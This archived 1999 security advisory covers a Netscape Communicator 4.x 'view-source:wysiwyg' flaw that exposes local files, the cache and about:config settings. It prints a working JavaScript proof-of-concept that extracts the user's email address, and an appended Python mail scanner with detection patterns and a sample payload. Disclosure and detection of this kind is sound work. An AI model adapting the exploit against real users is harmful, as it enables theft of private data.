netscape.view.source.javascript.txt

1999-08-17T00:00:00
ID PACKETSTORM:11814
Type packetstorm
Reporter Georgi Guninski
Modified 1999-08-17T00:00:00

Description

                                            `Date: Tue, 1 Jun 1999 19:08:49 +0300  
From: Georgi Guninski <joro@NAT.BG>  
To: BUGTRAQ@netspace.org  
Subject: Netscape Communicator "view-source:" security vulnerabilities  
  
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux  
(probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript"  
URLs. It parses them in a "view-source" window.  
The problem is that it allows access to documents included in the parent document via  
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed  
document.  
  
Vulnerabilities:  
  
Browsing local directories  
Reading user's cache  
Reading parsed HTML files  
Reading Netscape's configuration ("about:config") including user's  
email address, mail servers and password.  
Probably others  
  
This vulnerability may be exploited by using an HTML email message.  
  
Workaround: Disable JavaScript  
Netscape has been notified about the problem.  
  
Demonstration is available at: http://www.nat.bg/~joro/viewsource.html  
  
Regards,  
Georgi Guninski  
http://www.nat.bg/~joro  
http://www.whitehats.com/guninski  
  
<http://www.nat.bg/~joro/viewsource.html>  
  
<HTML>  
<BODY>  
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way   
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.  
The problem is that it allows access to documents included in the parent document via   
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.  
<BR>  
Vulnerabilities:  
<HR>  
Browsing local directories<BR>  
Reading user's cache<BR>  
Reading parsed HTML files<BR>  
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>  
Probably others<BR>  
<BR>  
This vulnerability may be exploited by using an HTML email message.  
<HR>  
Workaround: Disable JavaScript  
<HR>  
This demonstration tries to find your email address, it may take some time.  
<BR><BR>  
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>  
<HR>  
<SCRIPT>  
  
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv&gt>"  
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"  
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"  
+"setTimeout(\" "  
+"for(i=0;i<charstoread;i++) {"  
+" t=res;"  
+" find(mend);"  
+" for(c=1;c<256;c++) {"  
+" t=res + String.fromCharCode(c);"  
+" if (find(t,true,true)) {"  
+" res=t;"  
+" if (c==32) i=charstoread+1"  
+" } "  
+" }"  
+"}"  
+"res=res.substring(mag.length);"  
+"alert(msg1 + res);"  
+" ;\",3000);</"+"SCRIPT>'";  
//a=window.open(s);  
location=s;  
  
  
</SCRIPT>  
  
`
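As an added defensive example (written for this page, not part of Guninski's advisory or demo), a small mail-gateway check in Python that flags HTML bodies carrying the pattern the advisory describes: a view-source:wysiwyg:// URL loaded through a LAYER/ILAYER SRC or navigated to by script, with lone about:config references held for review. The sample mail bodies are constructed, not real messages.

```python
import re

# Indicators taken from the advisory: Netscape 4.x opens "view-source:wysiwyg://N/..."
# URLs in a view-source window, the demo loads about:config through an ILAYER whose
# SRC is such a URL, and the page is driven there by a script assigning location=.
VIEW_SOURCE_WYSIWYG = re.compile(r'view-source:\s*wysiwyg://\d+/', re.IGNORECASE)
LAYER_SRC_VIEW_SOURCE = re.compile(r'<I?LAYER[^>]*\bSRC\s*=\s*[\\"\']*view-source:', re.IGNORECASE)
SCRIPT_TAG = re.compile(r'<SCRIPT\b', re.IGNORECASE)
LOCATION_ASSIGN = re.compile(r'\b(?:window\.)?location\s*=', re.IGNORECASE)
ABOUT_CONFIG = re.compile(r'about:config', re.IGNORECASE)


def scan_html(body):
    """Return which of the advisory's indicators appear in an HTML mail body."""
    return {
        "view_source_wysiwyg": bool(VIEW_SOURCE_WYSIWYG.search(body)),
        "layer_src_view_source": bool(LAYER_SRC_VIEW_SOURCE.search(body)),
        "about_config": bool(ABOUT_CONFIG.search(body)),
        "script_sets_location": bool(SCRIPT_TAG.search(body) and LOCATION_ASSIGN.search(body)),
    }


def classify(body):
    """block: the full pattern (view-source URL loaded via LAYER or navigated to by script);
    review: a lone view-source/wysiwyg URL or an about:config reference; allow: nothing seen."""
    hits = scan_html(body)
    if hits["view_source_wysiwyg"] and (hits["layer_src_view_source"] or hits["script_sets_location"]):
        return "block"
    if hits["view_source_wysiwyg"] or hits["about_config"]:
        return "review"
    return "allow"


# Constructed sample bodies (not real mail): one modelled on the demo page, two harmless.
SUSPECT_MAIL = r'''<HTML><BODY>
<SCRIPT>
s="view-source:wysiwyg://1/javascript:s='<TITLE>t</TITLE>'"
 +"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>";
location=s;
</SCRIPT>
</BODY></HTML>'''

SETTINGS_MAIL = '<HTML><BODY><P>Your mail server is listed under about:config.</P></BODY></HTML>'

BENIGN_MAIL = '''<HTML><BODY>
<P>Release notes: <A HREF="http://example.invalid/notes.html">read online</A></P>
<IMG SRC="http://example.invalid/logo.gif">
</BODY></HTML>'''

if __name__ == "__main__":
    for name, body in [("suspect", SUSPECT_MAIL), ("settings", SETTINGS_MAIL), ("benign", BENIGN_MAIL)]:
        print(name, classify(body), scan_html(body))
```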